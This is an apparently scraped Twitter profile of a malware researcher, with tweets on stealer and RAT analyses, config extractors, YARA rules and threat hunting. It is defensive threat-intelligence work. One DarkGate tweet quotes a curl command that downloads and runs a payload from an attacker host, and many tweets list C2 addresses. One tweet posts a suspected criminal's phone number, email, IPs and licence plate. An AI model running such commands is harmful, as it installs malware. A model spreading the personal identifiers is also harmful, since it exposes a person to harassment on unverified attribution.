RussianPanda 🐼 🇺🇦 @RussianPanda9xx Twitter profile

Pinned Tweet

RussianPanda 🐼 🇺🇦

2 months

As promised, I am releasing the blog on the abuse of ITarian RMM by #DolphinLoader , a new MaaS Loader in the market. You will find some interesting stuff in there 👀🐬 Link:

9

51

178

Last Seen Profiles

@MiyamotoSan01

@monsuke_pubgm

@joshviney

@33rdPTA

@PranshuRadhey

@Brostrue1

@bokeplokalmalam

@sonyborn28

@femboy_16f

@Apple5x1

@oninoeshi

@LBMGuild

@stw_pdg

@MatteoCiru

@stw_pdg

@stwmaniax

@MatteoCiru

@Maomi_diyi

@MLuvaboy

@shelfofunread

@REPLACEBASE

@pshbns

@ACMEJournal

@RiqVermudt

@thegirlnxs

@MneurocienUMH

@stwmaniax

@AE_Media

@Alexelianor

@footsoldierRow

@JustSayRad

@Nicktrahan94

@whs_1969

@BinorRaja

@bokeplokalmalam

@ManOf_DaYr

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

6 months

Deanon is claiming to have the original version of Pegasus that works on all versions of Android and iOS. The pricing for the lifetime access is $ 1,500,000 👀 A few days later, Deanon offered the subscription model for Pegasus Panel. Around April 10, Apple started sending email

21

113

647

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Hunting for APTs at the park 😎

18

34

468

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

#Pikabot execution chain: ➡️ rundll32.exe <PikaBot_payload>.dll,Test (initial execution) ➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39) ➡️ whoami.exe /all ➡️ ipconfig.exe /all ➡️ schtasks.exe /Create /F /TN

7

92

350

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

When a SOC analyst closes the true positive alert as false positive ☠️

Malwarebytes

@Malwarebytes

1 year

IT admins after half the company clicked the phishing link.

36

250

1K

32

47

310

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

8 months

I have a high level of confidence that the RAT they are talking about in the iSoon leak is #ShadowPad , the successor of PlugX, which is used by APT41 (leak: ) C2: 118.31.3[.]116 References:

5

89

316

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

So, here is my attempt to analyze the new stealer on the block - #MeduzaStealer . The writeup comes with a config extractor 🐍 It is likely that the developers behind Meduza Stealer are also responsible for #AuroraStealer .

22

82

258

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

10 months

#100DaysofYara Day 6: This rule detects TrueCrypt, which is the crypter written in Golang and is used by many well-known stealer families, such as Raccoon Stealer, Vidar, MetaStealer, Redline, and Lumma stealers. Let's make our rules more confusing for malware developers 😉

7

51

251

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

11 months

I wrote the #PikaBot C2 extractor script. Since I am terrible at Regex, I found Yara pattern matching much more merciful 😅 You can access the C2 extractor here:

4

48

254

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

6 months

Another great showcase of using @urlscanio . You can use Options to specify the HTTP referer and user agent. Let's apply this to the threat case that @DaveLikesMalwre found today. We were able to extract the main culprit (chatgpt-app.]cloud) from the injected script that is

8

44

223

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Wrote a #DarkGate configuration extractor. Doesn't cost 15k per month 🥲

9

36

222

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Check out my latest analysis on #WhiteSnakeStealer with them config extractors 🐍 I know, the image does not represent the white snake, but a shoutout to @0xToxin for generating it for me 🤗

17

64

213

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

9 months

This was my first attempt at dissecting MacOS malware with barely any knowledge about how MacOS works, but I certainly learned a lot. I present you the blog on #AtomicStealer or From Russia With Code: Disarming Atomic Stealer

5

42

203

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

I’m telling you, I’m a panda 🐼 👀

25

1

197

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

8 months

New #PlanetStealer written in Golang. What do we know so far? 🔒 It's UPX-packed. Simple XOR string encryption. Sends POST requests to C2 server: 193.178.170[.]30 (can anyone find a login link?) 😅 with exfiltrated data: ✅ /submit/info - sends the initial information,

6

39

198

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

The new #Nitrogen 2.0 campaign comes back with some juicy stuff...🤿 ✅ AMSI, WLDP bypass, ETW patching, AntiHook, and the implementation of KrakenMask ✅ Usage of transacted hollowing ✅ Obfuscated Python scripts delivering Sliver C2 and Cobalt Strike payloads ✅ Usage of

5

55

194

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

3 months

🚨 Breaking News! 📷 #ANYRUN sandbox now offers #Windows10 x64 VM to free users. You can detonate, analyze, and interact with malware in a modern OS. Sign up and start your first analysis 📷… I have been using ANYRUN a lot lately, not going to lie ☺️

Interactive Online Malware Analysis Sandbox - ANY.RUN

Cloud-based malware analysis service. Take your information security to the next level. Analyze suspicious and malicious activities using our innovative tools.

app.any.run

11

49

192

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

11 months

Checkout my writeup on #MetaStealer 👾 It's not to be confused with #RedlineStealer ! Big thanks to @cod3nym for the review!

11

69

188

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Check out my writeup on #Vidar #Stealer 😊 @esthreat

eSentire Threat Intelligence Malware Analysis: Vidar Stealer

Dive deeper into the technical details gathered during eSentire’s Threat Response Unit (TRU) team’s research and threat analysis of the Vidar Stealer…

www.esentire.com

7

58

187

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

25 days

This is my second week at my new job after leaving eSentire. I just wanted to share that my research continues! I have much more time now to poke at malware and do research, especially with the support of my amazing teammates ❤️

16

6

185

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

15 days

MSIX is still so hot right now, here is the basic query to get started with some juicy malware hunting, thanks @urlscanio 🕵️ query: page.url:".msix" NOT page.url:*statics.teams* NOT page.url:*teams.static*

3

28

187

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

How I reverse malware … Disclaimer: don’t try this at home.

9

13

181

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

1/ You might have noticed that my area of interest is specifically stealers and RATs 😅 Wrote the configuration extractor for #Vidar stealer

4

51

179

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

6 months

I can't emphasize enough how invaluable @urlscanio has been in identifying additional domains related to #FIN7 . The effort would not have been possible without the support of the community and the contributions of people who submit those domains to the platform.

14

26

178

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

15 days

I heard stealers are struggling to restore Google🍪👀 Translated post ( #LummaC2 ): Guys, since Google has tightened the screws 🔩 and while we are exploring automation options, here are some temporary tips for working with Google accounts ☀️ Tips ⚡️ 1. For logging in, you now

12

32

181

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Raccoons are cute but not the stealers 🦝 Check out my latest writeup on Raccoon Stealer @esthreat

Malware Analysis: Raccoon Stealer Malware, Part 2

Explore the eSentire Threat Response Unit (TRU) team's analysis of Raccoon Stealer malware impacting the manufacturing and software sectors.

www.esentire.com

1

45

175

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

3 months

Do people actually read long technical blogs with myriad lines of codes and 5 paragraphs of explanations 🤔 I feel like my writeups are getting shorter and shorter … just because from my personal experience, I don’t read everything in a 10-15 pages article and I usually scroll

44

7

173

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

The report on the campaign I proudly named "Resident" is finally out 🔥 We have been tracking it since December 2022 across multiple EDR products - Carbon Black, SentinelOne and CrowdStrike @esthreat

eSentire Threat Intelligence Malware Analysis: Resident Campaign

Learn about the Resident campaign and the threat actor's use of Rhamadanthys stealer in this malware analysis from Threat Response Unit (TRU).

www.esentire.com

8

60

166

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 month

A good hunting rule for #LummaStealer C2s on @virustotal : query: entity:url title:"Just a moment..." url:.shop/api Need that PRO access 🥹

7

24

169

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

I am naming this #RogueRaticate campaign that leverages URL shortcuts to drop #NetSupportRAT 🐀 1/ ➡️ The user is getting infected via a drive-by download with the fake update screen (similar to SocGholish behavior). The initial payload is hosted on compromised WordPress

7

57

163

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

11 months

Check out my writeup on #ParallaxRAT 🐀 infection leading to lateral movement And, of course, not without the configuration extractor: @esthreat

7

50

164

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

Thank you everyone for your support and very helpful tips. I think the presentation went well. 🥹

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

We are presenting at #RSAC first thing in the morning tomorrow… I am terrified of public speaking, feeling very anxious, mostly because of the imposter syndrome, I think? Hopefully, will get some sleep tonight 😀

21

1

96

12

2

161

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

An interesting bundle that: ➡️ Drops Xen Manager password recovery ➡️ Drops Golang password extractor () ➡️ Drops XMRig ➡️ Exfiltrates credentials over an FTP channel ➡️ FTP: ftp.hpdataserver.altervista[.]org (lots of stolen credentials 💀) ➡️ Another

Release hack-browser-data-v0.4.4 · moonD4rk/HackBrowserData

Changes fix: find Chrome cookie file failed on windows @moonD4rk (#162) deploy: update more check on CI @moonD4rk (#160) refactor: formate code by golangci-lint @moonD4rk (#159) fix: can not acces...

github.com

2

42

155

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

Finished the write-up on #PSWSTEALER . It's been awhile since I touched Medium...

PSWSTEALER Analysis

The .NET stealer was first advertised on the Russian-speaking forum in March 2023 at a very affordable price:

medium.com

6

53

156

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

1/ #QuasarRAT 🐀 was observed being delivered via #OneNote . Shoutout to @dr4k0nia for helping me with deobfuscating the "injector" ✏️ and showing me some .NET dark arts. C2: ghcc.duckdns[.]org:4782 Extracted configuration:

4

45

155

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

It’s time to replace you, IDA. One step at a time 🥷 @psifertex My opsec is lit, I know.

21

8

154

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Potential #ducktail #infostealer . The binary is a mess. Has ngrok embedded in and .NET dependencies (I believe, for credentials stealing). It collects Brave, Edge, Chrome, and Firefox browsing data, takes the screenshot of the user machine, and saves it under %temp% folder with

3

35

149

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 month

#PoseidonStealer switched from encoding the AppleScript using hexadecimal to a custom Base64-encoding alphabet. I wrote a config extractor to handle both the previous and the new versions. I ran across 38 samples found on VT, seems to work 😅 Output (38 samples):

6

22

150

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

7 months

Time to add #GlorySprout stealer to the list of shame. Check out my analysis on GlorySprout Stealer, or should I say Taurus Stealer? 🤔

7

50

146

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

7 months

#XStealer , shame on you for selling someone's project under your name. Simply changing the name doesn't change the origin or ownership of the work. It's actually a clone of #NemesisProject , a source code that was up for sale back in 2021.

16

24

147

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

29. What a scary number 🫣 But I will be forever 18 regardless 😂

39

0

140

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

11 months

Ice Ice Baby 🧊 #DanaBot dropping IcedID? Check out my writeup on the recent #IcedID sample we saw at @esthreat

4

35

136

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

The recent intrusion from #SocGholish infection we have observed at @esthreat If you see your email signatures are being replaced by: ✅ file://170.130.55[.]72/logocompany.jpeg ✅ file://170.130.55[.]72/main_logo.png Please isolate the host immediately 🚨 Article:

4

47

135

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

10 months

Found #PureLogs Stealer under the Christmas tree this year 🎄 Here is my attempt to unwrap it (detection rules included):

3

46

137

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

#GootLoader ~ 2 hours after > Cobalt Strike > PsHound > PowerShell SOCKS proxy > PsExec

Gootloader Malware Leads to Cobalt Strike and Hand-on-Keyboard…

Learn more about the Gootloader malware, how eSentire’s Threat Response Unit (TRU) and SOC Cyber Analysts detected the attack, and recommendations from…

www.esentire.com

5

41

137

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

Configuration extractor for #RaccoonStealer v2. 🦝

2

34

134

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

It is nothing new, but I just figured it would be handy to have a config extractor for #RemcosRAT somewhere 😅 🐀

5

37

132

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

Alright, with all the #ONNX Phishing-as-a-Service hype today, if this post gets 10 likes, I will reveal the name of the person behind it. Not asking for a million dollar 😂

Arda Büyükkaya

@WhichbufferArda

4 months

The Caffeine Phishing-as-a-Service (PhaaS) platform has undergone rebranding and is now known as ONNX Store. Key details include: - Targeting Method: Cybercriminals use the service to send PDF attachments with embedded QR codes to financial institutions. - Phishing Mechanism:

14

69

318

5

16

132

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

3 months

My happiness ❤️🐶

16

0

124

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

3 months

I had so much “fun” looking into this case 😅 Dubbed the dropper as #Gh0stGambit 🐀 deploying #Gh0stRAT Link:

7

29

126

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

IDAPython string decryption script for #RaccoonStealer . Tested on the latest build 2.1.0-4. I know, my Python is really ugly 😂

3

34

116

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

1/ #socgholish deploying #NetSupportRAT at the first stage. The threat actor(s) deployed a PowerShell script via the NetSupport session after 2 days. Thanks @dr4k0nia for a reversing session, she found the next stage to be #asyncrat 🐀

1

42

121

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

Wrote a config extractor for #QuasarRAT Inspired by @herrcore stream 😅

2

30

122

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

#Redline Stealer delivered via likely a drive-by download. Executed via .msix file (Chat-GPT-x64.msix). The file contains the malicious PowerShell script that reaches out to adv-pardorudy[.]ru to pull the Redline Stealer and load it as an assembly into memory. Redline C2:

7

25

122

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

28. Getting old 😭

37

0

122

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

Potentially related. Phone numbers: 79518535470 IPs: 95.32.242.124, 176.59.64.64 Email: horoshev7 @gmail [.com VK: https://vk.]com/id95447714 (deleted) VK: https://vk.]com/id58582822 (old) VK: https://vk.]com/id59986572 (old) Possible license plate: О570ЕТ136

Jon DiMaggio

@Jon__DiMaggio

5 months

RANSOMWARE DIARIES 5 is out! Want to know more about Dmitry…I mean #LockBit ?! 😹I have a LOT more intel and now so do you!

22

112

368

6

14

122

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 month

Have you considered exploring @anyrun_app 's Threat Intelligence Lookup service? Instead of going through thousands of public reports on the sandbox platform, you can create targeted queries to find exactly what you need. I’m currently working on a blog to showcase a few use cases

5

20

121

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

23 days

Check out the new Safebrowsing service by @anyrun_app ! 🔥 A virtual browser that lets you safely investigate URLs in an isolated environment. It’s super easy to use and even warns you about potential threats. And you know what is the best part? It’s free! ☺️ 👇

6

26

121

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

Wedding ready 👰🏻‍♀️💒

15

0

120

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

More #DarkGate shenanigans cd /d %temp% & curl -o Autoit3.exe http://thebesttime[.]buzz:8080 & curl -o spcsln.au3 http://thebesttime[.]buzz:8080/msiqvxfwlqj & Autoit3.exe spcsln.au3 C2: hxxp://thebesttime[.]buzz | hxxp://whereistime[.]buzz Potential post-infection C2:

4

29

118

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

8 months

Happy Lunar New Year! 🧧 Chúc mừng năm mới 🐉

8

0

115

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 month

Saturdays are for smiles and good vibes ☀️😁

11

1

118

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 months

I just noticed that I reached 10k followers. I really appreciate your continuous support 🐼 I would want to continue to contribute to the community as much as I can. Also, I am currently working on a blog, ready to be released very soon … 💙 #pandasupport

11

1

115

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

9 months

Just another .NET stealer 🥱

FalconFeeds.io

@FalconFeedsio

9 months

We have discovered a new stealer called 'Sentinel Stealer.' Its features include browser, communication, crypto, games, FTP/SSH, Discord injection, wallet injection, etc #sentinelstealer #malware #stealer

1

22

70

3

18

112

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

We have observed the campaign that we named #Nitrogen . It leverages DLL side-loading to execute the malicious payload. Currently, I am working on the full write-up with my colleague @jgajek 🔥

2

31

115

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

Wrote a configuration extractor for #AuroraStealer Maybe Golang is not that bad 😜

2

20

113

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

10 months

#100DaysofYara Day 2: This one will be on #JinxLoader (Golang); the new version comes in Golang, and the previous ones were based on .NET. Hopefully, will do a full write-up on this loader soon 🥹

3

25

114

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

10 months

Just before 2024, I am releasing another blog addressing the new #MetaStealer version, talking about some stealer's drama, and I also included something on the Google cookie refresher "feature" ... Happy New Year, folks! 🎇

8

39

113

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

10 months

Entering 2024 strongly with #100DaysOfYARA . Day 1: my first Yara rule for this year will be the updated rule on newer samples of #MeduzaStealer

0

22

114

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

#LummaC2 🪽 config extractor for build and C2:

2

31

109

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

3 months

Donut Loader 🍩 is still being used by many threat actors to deliver nasty RATs. Check out the latest writeup which involves one infection leading to four malware 👾 I just wanted four rats in my art, oh well ... Link:

3

32

106

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

The case of #DarkGate dropping #DanaBot 🤖 @esthreat

From DarkGate to DanaBot

Learn more about the DarkGate and Danabot malware and get security recommendations from our Threat Response Unit (TRU) to protect your business from this…

www.esentire.com

1

32

105

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

8 months

When I see Rust malware packed with VMProtect, I suddenly face an existential crisis...

8

7

104

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

#AuroraStealer has a new March 2023 update (the first one this year). ➡️ Added FTP (for FileZilla only) and RDP grabbers ➡️ New grabber functionality (ability to choose file extensions) ➡️ The attackers are able to change the ports now, so no more default 8081 :( ➡️ Ports to

4

36

102

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Wrote a "quick" configuration extractor for #DynamicRAT mentioned here Config extractor: More payloads found based on the Yara rule: Happy Friday! 🌻

Gi7w0rm

@Gi7w0rm

1 year

New #BlogPost : It seems @tosscoinwitcher and I have discovered a previously undocumented #Java -based #RAT . Dupped #DynamicRAT , the #malware has a vast array of features. Read all about it the discovery process here: #CyberSecurity #infosec #networktamper

11

50

161

3

26

98

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

Panda is unavailable, she is too busy … 🔞

6

3

101

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Tribute to #AuroraStealer 🪦 or my attempt to reverse a Golang stealer @esthreat

eSentire Threat Intelligence Malware Analysis: Aurora Stealer

Dive deeper into the technical details gathered during eSentire’s Threat Response Unit (TRU) team’s research and threat analysis of the Aurora Stealer…

www.esentire.com

2

33

100

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

7 months

Spent a day looking for Easter eggs in malware land... 😭 #tiredme

10

0

102

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

Nothing is worse than analyzing a malware developed by Chinese folks. Like, can you just make it easier a little and less confusing? I have lost track on following the chain of persistence 😂 I was analyzing a sample that I thought was a rat but it was just a rat dropper, but

5

2

100

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

Highlight of the SF trip 🌉

5

0

100

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

We have been observing #BatLoader 🦇 using batch files to: ➡️ Install Python 3.9.9 ➡️ Use pip to install pywin32 and wmi packages. ➡️ Unpack the compressed OpenSSL library files using PowerShell ➡️ Launching Python scripts obfuscated with PyArmor

1

37

99

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

My little write-up on #D3fackLoader , the lovely MaaS loader from our boy Sergei. Preparing another blog on it, stay tuned 👀 Article: @esthreat

4

27

100

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

7 months

Imagine being an idiot and a malware developer / threat actor at the same time 🤷🏻‍♀️

20

9

98

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

10 months

Merry Christmas 🎄

9

0

100

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

Happy Independence Day 🇺🇸

13

1

98

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

3 months

It doesn't matter if your payload is FUD or how hard you try to blur out the payload you uploaded to VT. I will still find you and detect you, #D3FackLoader [' https://steamcommunity[.]com/profiles/76561199689894251', '\\21[.]txt', '\\21[.]cmd', '\\85[.]zip', '\\855[.]zip',

7

9

98

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

I want to make it clear once and for all. I don’t have anything against Russian people. There are no bad nations, there are only bad people. I talk to some Russian folks and they are perfectly fine. I was born and raised in Ukraine, yes. Why do I have the RussianPanda handle? It

19

2

97

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

An interesting RAT written in JS. ✅ Receives server's response and decrypts it with RC4 ✅ Executes the decrypted command with "eval" ✅ Sends POST requests to the C2 in an encrypted form (RC4 + Base64)

Ksenia \n

@naumovax

5 months

Unknown #RAT was found on the C2: 110.34.30[.]9:6600 👻 note: this IP with another port is Cobalt Strike Server

4

5

41

2

29

97

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Check out the #LockBit case we were investigating, where MSP was targeted using RMM tools @esthreat

LockBit Ransomware Gang Attacks an MSP and Two Manufacturers Using…

Read this blog to learn how the eSentire Threat Response Unit (TRU) discovered and shut down three ransomware attacks from the Russia-linked LockBit gang.

www.esentire.com

2

25

98

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

#SolarMarker has switched to using Inno Setup to package the encrypted .NET payload. You can use any Inno Setup unpacker to extract it, for example, Innounp: Created a quick script to decrypt the .NET payload. In our example, the XOR key is

Squiblydoo

@SquiblydooBlog

1 year

First stage has recently changed. I may need a new blogpost. Low Detection #SolarMarker #Signed #EV ТОВ "Софт Енжін юа" C2: 146.70.71.135 C2: 91.206.178.109 VT: MB: Backdoor: @JAMESWT_MHT @luke92881

4

15

45

4

26

97

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

4 months

I am sponsoring 3 people for the CTF this Saturday hosted by awesome folks at @TheDFIRReport ! 🤩 I definitely recommend trying it out, there are only a few blue team CTFs out there but this one is next level 💙 All you need to do is follow me, like the post and put a comment

The DFIR Report

@TheDFIRReport

4 months

🚀DFIR Labs CTF🚀 Our next CTF will be July 6, 16:00 – 20:00 UTC. ➡️Only $9.99 to join! ➡️Choose Elastic or Splunk as your SIEM ➡️Join our DFIR Labs CTF Discord Server ➡️Top 3 players win free swag! Register: More info:

4

29

81

18

21

94

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

5 months

We are presenting at #RSAC first thing in the morning tomorrow… I am terrified of public speaking, feeling very anxious, mostly because of the imposter syndrome, I think? Hopefully, will get some sleep tonight 😀

21

1

96

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

8 months

Excited to announce that I will be speaking at #RSA Conference 2024 with my colleague Spence (he does exist). Come see us in May 🥹💕

15

3

96

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

6 months

Unraveling Not AZORult but Koi Loader: A Precursor to Koi Stealer Did some analysis on #KoiLoader which ultimately led to #KoiStealer . Warning ⚠️It is not AZORult. The blog: @esthreat

8

35

95

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 months

Sometimes you get caught up in being unhappy for awhile that you forget there is a reset button...

8

0

92

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 month

#MeduzaStealer is pushing out the bypass method in the test version to get cookies from Chrome 127. The pricing is still the same. Translation: 🐍🔥 Some stealer users encountered Chrome update 127, which changed the encryption for cookies by executing the process in a separate

Who said what

@g0njxa

1 month

Google Chrome implemented an update that caused a major outage in cookie collection from infostealers, and users are experimenting several issues Vidar talks about the usage of "a TPM module for encryption" Vidar, Lumma and StealC are already working on this issue to fix it

11

94

436

3

27

93

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

2 years

Wrote an #AsyncRAT 🐀 config extractor using DotNetPE based on @dr4k0nia sample 😝

dr4k0nia

@dr4k0nia

2 years

#CTI #AsyncRAT C2: xe3x1.ath[.]cx C2: xonxen.dnsalias[.]com Port: 6666 SHA256: 76f655949c39dfd591636997afae0a090c9ac51f8972e862a092eba574f517e9 Pretty much a vanilla sample no obfuscation or additions.

4

7

32

2

29

91

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

1 year

Some #SolarMarker fun. They changed the DLL payload delivery slightly. Hopefully, it stays the same for a little bit. ▶️C2: 78.135.73[.]180 ▶️Version: JL-4 Here is the DLL payload extractor for the recent version:

5

23

87

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

8 months

Extracted C2 domains for #LummaC2 (infected vibrator case 101 🦠): gemcreedarticulateod[.]shop/api secretionsuitcasenioise[.]shop/api claimconcessionrebe[.]shop/api liabilityarrangemenyit[.]shop/api modestessayevenmilwek[.]shop/api triangleseasonbenchwj[.]shop/api

vx-underground

@vxunderground

8 months

Sitting here wondering if we should approach this person, requesting to purchase the used sex toy, to inspect it for malware 🤔🤔🤔🤔🤔

31

29

438

4

17

91

RussianPanda 🐼 🇺🇦

@RussianPanda9xx

9 months

New short writeup on #WorkersDevBackdoor . The backdoor was also previously spotted by @0xBurgers @esthreat

5

31

91